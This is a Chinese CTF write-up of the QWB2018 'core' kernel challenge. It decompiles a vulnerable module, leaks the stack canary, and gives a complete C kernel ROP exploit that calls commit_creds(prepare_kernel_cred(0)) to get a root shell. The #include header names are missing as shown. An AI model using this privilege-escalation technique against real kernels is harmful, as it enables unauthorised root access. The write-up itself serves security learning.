前面做了一道kernel-uaf的题,接着复现一下kernel-rop的题目
环境分析
- 首先按照kernel pwn的套路,先解压core.cpio文件,查看init文件
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2
insmod /core.ko
poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys
poweroff -d 0 -f
- 从脚本中可以看到有我们需要分析的模块文件是core.ko,然后还有条定时关机的命令(poweroff -d 120 -f &),为了不影响我们调试,所以把这条命令删掉再重打包,/tmp目录下有一个符号文件kallsyms,可以leak出内核信息,找到commit_creds和prepare_kernel_cred的地址
./gen_cpio.sh core.cpio
- 启动时候发现有报错,是因为分配的内存过小,将start.sh 中-m分配的64M修改为128M即可
Kernel panic - not syncing: Out of memory and no killable processes...
模块分析
- 首先看开了什么保护
☁ give_to_player checksec core.ko
[*] '/home/hacker_mao/desktop/ctf_game/QWB2018/give_to_player/core.ko'
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x0)
- 然后ida分析,core_copy_func函数的参数是signed __int64而qmemcpy的函数是unsigned __int16,当传入参数a1为负数会产生溢出,将我们的rop链拷贝到栈上
signed __int64 __fastcall core_copy_func(signed __int64 a1)
{
signed __int64 result; // rax
__int64 v2; // [rsp+0h] [rbp-50h]
unsigned __int64 v3; // [rsp+40h] [rbp-10h]
v3 = __readgsqword(0x28u);
printk(&unk_215);
if ( a1 > 63 )
{
printk(&unk_2A1);
result = 0xFFFFFFFFLL;
}
else
{
result = 0LL;
qmemcpy(&v2, &name, (unsigned __int16)a1);
}
return result;
}
- core_ioctl函数可以控制全局变量off,而core_read会根据off的偏移来拷贝 64 个字节到用户空间,我们可以控制off来leak canary和一些地址
__int64 __fastcall core_ioctl(__int64 a1, int a2, __int64 a3)
{
signed __int64 v3; // rbx
v3 = a3;
switch ( a2 )
{
case 1719109787:
core_read(a3);
break;
case 1719109788:
printk(&unk_2CD);
off = v3;
break;
case 1719109786:
printk(&unk_2B3);
core_copy_func(v3);
break;
}
return 0LL;
}
unsigned __int64 __fastcall core_read(__int64 a1)
{
__int64 v1; // rbx
__int64 *v2; // rdi
signed __int64 i; // rcx
unsigned __int64 result; // rax
__int64 v5; // [rsp+0h] [rbp-50h]
unsigned __int64 v6; // [rsp+40h] [rbp-10h]
v1 = a1;
v6 = __readgsqword(0x28u);
printk(&unk_25B);
printk(&unk_275);
v2 = &v5;
for ( i = 16LL; i; --i )
{
*(_DWORD *)v2 = 0;
v2 = (__int64 *)((char *)v2 + 4);
}
strcpy((char *)&v5, "Welcome to the QWB CTF challenge.\n");
result = copy_to_user(v1, (char *)&v5 + off, 64LL);
if ( !result )
return __readgsqword(0x28u) ^ v6;
__asm { swapgs }
return result;
}
- core_write让我们对name进行写入,通过core_write和core_copy_func函数实现写入rop_chain
signed __int64 __fastcall core_write(__int64 a1, __int64 a2, unsigned __int64 a3)
{
unsigned __int64 v3; // rbx
v3 = a3;
printk(&unk_215);
if ( v3 <= 0x800 && !copy_from_user(&name, a2, v3) )
return (unsigned int)v3;
printk(&unk_230);
return 4294967282LL;
}
利用思路
- 通过 ioctl 设置 off,然后通过 core_read() leak 出 canary
- 通过 core_write() 向 name 写,构造 ropchain
- 通过 core_copy_func() 从 name 向局部变量上写,通过设置合理的长度和 canary 进行 rop
- 通过 rop 执行 commit_creds(prepare_kernel_cred(0))
- 返回用户态,通过 system(“/bin/sh”) 等起 shell
编写exp
- 编写exp的时候还要边调试,下图是调试寻找泄漏canary的偏移,由图可知道canary距离rsp的偏移是0x40,返回地址的偏移是0x50
![[kernel pwn] QWB2018-core_第1张图片](http://img.e-com-net.com/image/info10/151b6cc45ab042bf87bb3f6a07c1b3f0.jpg)
- 接下来是找覆盖返回地址的偏移,由图可知返回地址偏移是0x50
![[kernel pwn] QWB2018-core_第2张图片](http://img.e-com-net.com/image/info10/103dd09423544f0aa643cb25950b1705.jpg)
- 找gadget的偏移,不能从带符号的vmlinux里面找gadget,要从bzImage里面提取之后再找gadget,先用extract-vmlinux提取文件出来,再用ropper找gadegt
☁ give_to_player ./extract-vmlinux ./bzImage > rop_gadget
☁ give_to_player ropper --file './rop_gadget' --search "pop rdx; ret"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdx; ret
[INFO] File: ./rop_gadget
0xffffffff81f1023d: pop rdx; ret 0x6fff;
0xffffffff817f8da2: pop rdx; ret 0xa0;
0xffffffff817023a4: pop rdx; ret 0xebff;
0xffffffff810a0f49: pop rdx; ret;
☁ give_to_player bpython
bpython version 0.17.1 on top of Python 2.7.12 /usr/bin/python
>>> from pwn import *
>>> vmlinux = ELF("./rop_gadget")
[*] '/home/hacker_mao/desktop/ctf_game/QWB2018/give_to_player/rop_ga
dget'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0xffffffff81000000)
RWX: Has RWX segments
>>> pop_rdx_ret_offset = hex(0xffffffff810a0f49 - 0xffffffff81000000)
>>> pop_rdx_ret_offset
'0xa0f49'
- 写exp,这里直接套用charlie师傅的exp
//gcc exp.c -o exp -static -masm=intel
#include
#include
#include
#include
#include
#include
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[*]status has been saved.");
}
void binsh()
{
system("/bin/sh");
}
int main()
{
save_status();
void* commit_creds;
void* base_addr;
void* prepare_kernel_cred;
FILE* base=popen("grep startup_64 /tmp/kallsyms |awk -F' ' '{print $1}'","r");
fscanf(base,"%p",&base_addr);
commit_creds=base_addr+0x9c8e0;
prepare_kernel_cred=base_addr+0x9cce0;
printf("commit_creds is %p \nbase is %p \nprepare is %p\n",commit_creds,base_addr,prepare_kernel_cred);
fclose(base);
int fd = open("/proc/core",O_WRONLY);
if(fd<0)
{
printf("open core failed\n");
exit(-1);
}
ioctl(fd,0x6677889C,0x40); //set offset
long long canary[0x10];
ioctl(fd,0x6677889B,canary); //get canary
printf("ret addr is %lx\n",canary[2]);
long long payload[0x40];
payload[8]=canary[0]; //canary
payload[9]=canary[1]; //rbp
void* mov_rdi_rax_jmp_rdx=base_addr+0x6a6d2;
void* prdx=base_addr+0xa0f49;
void* prdi=base_addr+0xb2f;
void* swapgs=base_addr+0xa012da;
void* iretq=base_addr+0x50ac2;
int i=10;
payload[i++]=prdi; //pop rdi;
payload[i++]=0;
payload[i++]=prepare_kernel_cred; //prepare_kernel_cred(0);
payload[i++]=prdx; //pop rdx;
payload[i++]=commit_creds; //commit_creds(prepare_kernel_cred(0));
payload[i++]=mov_rdi_rax_jmp_rdx; //mov rdi, rax; call rdx;
payload[i++]=swapgs; //swapgs; popfq; ret
payload[i++]=0;
payload[i++]=iretq; //iretq; ret;
payload[i++]=(size_t)binsh;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_sp;
payload[i++] = user_ss;
write(fd,payload,0x200);
long long v=0xffffffffffff0000 | (0x100);
ioctl(fd,0x6677889A,v);
return 0;
}
- 编译exp,然后重打包fs,启动系统,运行exp
☁ give_to_player gcc exp.c -o exp -static -masm=intel
☁ give_to_player cd core
☁ core ./gen_cpio.sh core.cpio
☁ core cp ./core.cpio ../
☁ core cd ..
☁ give_to_player ./start.sh
/ $ ./exp
[*]status has been saved.
commit_creds is 0xffffffffbd29c8e0
base is 0xffffffffbd200000
prepare is 0xffffffffbd29cce0
ret addr is ffffffffc039119b
/ # id
uid=0(root) gid=0(root)
/ #
参考文章:
- https://ch4r1l3.github.io/2018/10/09/linux-kernel-pwn-%E5%88%9D%E6%8E%A2-3/
- http://m4x.fun/post/linux-kernel-pwn-abc-1/#kernel-rop-2018%E5%BC%BA%E7%BD%91%E6%9D%AF-core